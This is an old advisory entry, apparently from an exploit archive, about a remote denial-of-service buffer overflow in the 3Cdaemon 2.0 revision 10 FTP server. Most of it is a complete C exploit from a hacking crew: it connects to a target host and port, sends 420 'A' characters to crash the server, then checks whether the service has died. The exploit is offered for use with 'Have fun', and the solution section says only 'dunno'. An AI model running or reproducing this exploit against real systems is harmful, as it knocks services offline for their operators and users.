|
COMMAND 3Cdaemon remote DoS SYSTEMS AFFECTED 3Cdaemon 2.0 revision 10 PROBLEM MaD SKiLL \'H\' [http://www.madskill.tk] says : When 400+ chars are sent to the FTP server, it crashes imediatly. Sample : ======== /* MaD SKiLL \'H\' * MsH 4 life! http://www.madskill.tk * *Private Release* * * 3CDaemon 2.0 revision 10 DoS * * 11:12 14-4-2002: BOF flaw found by skyrim * 1:00 15-4-2002: exploit done. * 23:31 16-4-2002: Edited the exploit slightly, it\'s a better code now * * This program will exploit the buffer overflow vulnerability of * 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash * at any time they\'re send. * * Tested on: * [OS] [version] * Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10 * * ### * ##### #### ## * ###### ###### ###### * ###### ######## ######## ######## ###### * ###### ####### ### ########### ######## ####### * ###### ######## #### ############ ######## ####### * ############### ##### ############ ####### ####### * ############## ###### ############ ####### ####### * ############## ####### ########### ###### ####### * ############# ######## ### ######## ###### ######### * ############ ### #### ### ####### ################# * ##### ############### ########## ################# * ### ######### ##### ######### ################ * #### ######### ##### ######### ################ * ### ######### ############# ################ * ## ######### ###### ###### ####### * ### #### ###### ####### * ###### ######## * ###### ######## * #### ## ###### ### ### ### ###### ######## * ####### ######## ### #### ##### ##### ####### * ############### ### #### ##### ##### ####### * ####### ######## #### ##### ## ### * ###### ######### #### #### ##### * ##### ######## #### #### #### * ###### ######## #### #### ### #### ## * ########## ### #### #### ########## ###### * ######### ### ########################### * ########## ######## ##################### * ############# ###### ########## ########## * ######## ##### #### ### ### ### ### * * I don\'t know if this will work on versions other then the one I tested it on. * Have fun. * * Crew shouts go to: MsH, DFA, uDc * Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo, * xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else. * * skyrim (skyrim@m4dskill.tk) */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define BOFSIZE 420 char banner(void) { printf(\"MaD SKiLL \'H\' 3CDaemon 2.0 revision 10 DoS\\n.:[MsH]:.\\n ---\\n\"); } void E(char *msg) { perror(msg); exit(1); } main(int argc, char *argv[]) { static char ownage[BOFSIZE]; int sockfd, sockfd2, n; struct sockaddr_in server_addr; struct hostent *server; if (argc != 3) { fprintf(stderr,\"Usage: %s hostname/ip port\\n\", argv[0]); exit(1); } banner(); memset(ownage, \'A\', BOFSIZE); sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) E(\"Error occured during opening socket\"); server = gethostbyname(argv[1]); if (server == NULL) E(\"Error occured during host lookup -No such host?-\\n\"); bzero((char *) &server_addr, sizeof(server_addr)); server_addr.sin_family = AF_INET; bcopy((char *)server->h_addr, (char *)&server_addr.sin_addr.s_addr, server->h_length); server_addr.sin_port = htons(atoi(argv[2])); printf(\"Connecting to target FTP server... \"); if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E(\"Error occured during connecting\\n\"); } printf(\"Connected, Probing BOF... \\n\"); n = write(sockfd,ownage,strlen(ownage)); if (n < 0) { E(\"Error occured during writing to socket\"); } close(sockfd); sockfd2=socket(AF_INET, SOCK_STREAM, 0); printf(\"Done, checking if server is dead.. \\n\"); sleep(5); if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { printf(\"Couldn\'t establish connection: It seems like it died! =)\\n\"); exit(0); } printf(\"Server is still alive. Perhaps its not vulnerable?\\n\"); return 0; } SOLUTION dunno